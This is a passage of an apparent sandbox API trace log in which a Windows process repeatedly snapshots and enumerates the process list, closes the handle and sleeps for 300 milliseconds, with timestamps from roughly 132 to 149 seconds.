hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.141] CloseHandle (hObject=0xc4) returned 1 [0132.141] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.146] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.283] CloseHandle (hObject=0xbc) returned 1 [0132.283] Sleep (dwMilliseconds=0x12c) [0132.692] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.697] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.800] CloseHandle (hObject=0xc4) returned 1 [0132.800] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.805] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.927] CloseHandle (hObject=0xbc) returned 1 [0132.927] Sleep (dwMilliseconds=0x12c) [0133.348] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.353] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.473] CloseHandle (hObject=0xc4) returned 1 [0133.473] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0133.478] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.609] CloseHandle (hObject=0xbc) returned 1 [0133.610] Sleep (dwMilliseconds=0x12c) [0133.935] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.941] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.054] CloseHandle (hObject=0xc4) returned 1 [0134.054] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.060] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.176] CloseHandle (hObject=0xbc) returned 1 [0134.176] Sleep (dwMilliseconds=0x12c) [0134.485] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.490] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.527] CloseHandle (hObject=0xc4) returned 1 [0134.527] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.626] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.664] CloseHandle (hObject=0xbc) returned 1 [0134.664] Sleep (dwMilliseconds=0x12c) [0135.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.066] CloseHandle (hObject=0xc4) returned 1 [0135.066] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.071] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.208] CloseHandle (hObject=0xbc) returned 1 [0135.208] Sleep (dwMilliseconds=0x12c) [0135.546] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.551] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.600] CloseHandle (hObject=0xc4) returned 1 [0135.600] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.608] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.656] CloseHandle (hObject=0xbc) returned 1 [0135.656] Sleep (dwMilliseconds=0x12c) [0136.024] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0136.030] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.095] CloseHandle (hObject=0xc4) returned 1 [0136.095] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0136.101] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.700] CloseHandle (hObject=0xbc) returned 1 [0136.700] Sleep (dwMilliseconds=0x12c) [0137.084] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.089] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.175] CloseHandle (hObject=0xc4) returned 1 [0137.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.181] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.350] CloseHandle (hObject=0xbc) returned 1 [0137.351] Sleep (dwMilliseconds=0x12c) [0137.670] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.675] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.722] CloseHandle (hObject=0xc4) returned 1 [0137.722] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.727] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.812] CloseHandle (hObject=0xbc) returned 1 [0137.814] Sleep (dwMilliseconds=0x12c) [0138.171] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.177] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.238] CloseHandle (hObject=0xc4) returned 1 [0138.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.363] CloseHandle (hObject=0xbc) returned 1 [0138.363] Sleep (dwMilliseconds=0x12c) [0138.674] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.682] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.728] CloseHandle (hObject=0xc4) returned 1 [0138.728] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.733] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.774] CloseHandle (hObject=0xbc) returned 1 [0138.774] Sleep (dwMilliseconds=0x12c) [0139.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.118] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.197] CloseHandle (hObject=0xc4) returned 1 [0139.197] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.204] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.251] CloseHandle (hObject=0xbc) returned 1 [0139.251] Sleep (dwMilliseconds=0x12c) [0139.613] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.620] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.716] CloseHandle (hObject=0xc4) returned 1 [0139.716] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.721] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.838] CloseHandle (hObject=0xbc) returned 1 [0139.838] Sleep (dwMilliseconds=0x12c) [0140.774] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0140.780] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.116] CloseHandle (hObject=0xc4) returned 1 [0141.117] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0141.124] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.230] CloseHandle (hObject=0xbc) returned 1 [0141.230] Sleep (dwMilliseconds=0x12c) [0142.135] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.141] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.368] CloseHandle (hObject=0xc4) returned 1 [0142.368] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.373] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.547] CloseHandle (hObject=0xbc) returned 1 [0142.547] Sleep (dwMilliseconds=0x12c) [0142.879] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.883] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.973] CloseHandle (hObject=0xc4) returned 1 [0142.973] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.978] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.111] CloseHandle (hObject=0xbc) returned 1 [0143.111] Sleep (dwMilliseconds=0x12c) [0143.431] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.436] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.490] CloseHandle (hObject=0xc4) returned 1 [0143.490] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0143.495] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.834] CloseHandle (hObject=0xbc) returned 1 [0143.835] Sleep (dwMilliseconds=0x12c) [0144.198] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.204] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.293] CloseHandle (hObject=0xc4) returned 1 [0144.293] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.297] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.358] CloseHandle (hObject=0xbc) returned 1 [0144.358] Sleep (dwMilliseconds=0x12c) [0144.676] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.681] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.721] CloseHandle (hObject=0xc4) returned 1 [0144.721] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.726] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.770] CloseHandle (hObject=0xbc) returned 1 [0144.770] Sleep (dwMilliseconds=0x12c) [0145.110] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.206] CloseHandle (hObject=0xc4) returned 1 [0145.206] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.211] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.298] CloseHandle (hObject=0xbc) returned 1 [0145.299] Sleep (dwMilliseconds=0x12c) [0145.644] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.650] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.749] CloseHandle (hObject=0xc4) returned 1 [0145.749] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.754] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.810] CloseHandle (hObject=0xbc) returned 1 [0145.810] Sleep (dwMilliseconds=0x12c) [0146.299] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.306] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.456] CloseHandle (hObject=0xc4) returned 1 [0146.456] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.461] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.583] CloseHandle (hObject=0xbc) returned 1 [0146.583] Sleep (dwMilliseconds=0x12c) [0146.887] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.893] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.989] CloseHandle (hObject=0xc4) returned 1 [0146.989] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.995] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.085] CloseHandle (hObject=0xbc) returned 1 [0147.086] Sleep (dwMilliseconds=0x12c) [0147.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0147.449] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.543] CloseHandle (hObject=0xc4) returned 1 [0147.543] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.549] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.672] CloseHandle (hObject=0xbc) returned 1 [0147.672] Sleep (dwMilliseconds=0x12c) [0148.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.007] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.123] CloseHandle (hObject=0xc4) returned 1 [0148.123] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.129] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.321] CloseHandle (hObject=0xbc) returned 1 [0148.321] Sleep (dwMilliseconds=0x12c) [0148.643] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.649] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.746] CloseHandle (hObject=0xc4) returned 1 [0148.746] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.753] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.842] CloseHandle (hObject=0xbc) returned 1 [0148.843] Sleep (dwMilliseconds=0x12c) [0149.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.152] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.190] CloseHandle (hObject=0xc4) returned 1 [0149.190] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.258] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.296] CloseHandle (hObject=0xbc) returned 1 [0149.296] Sleep (dwMilliseconds=0x12c) [0149.611] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.617] 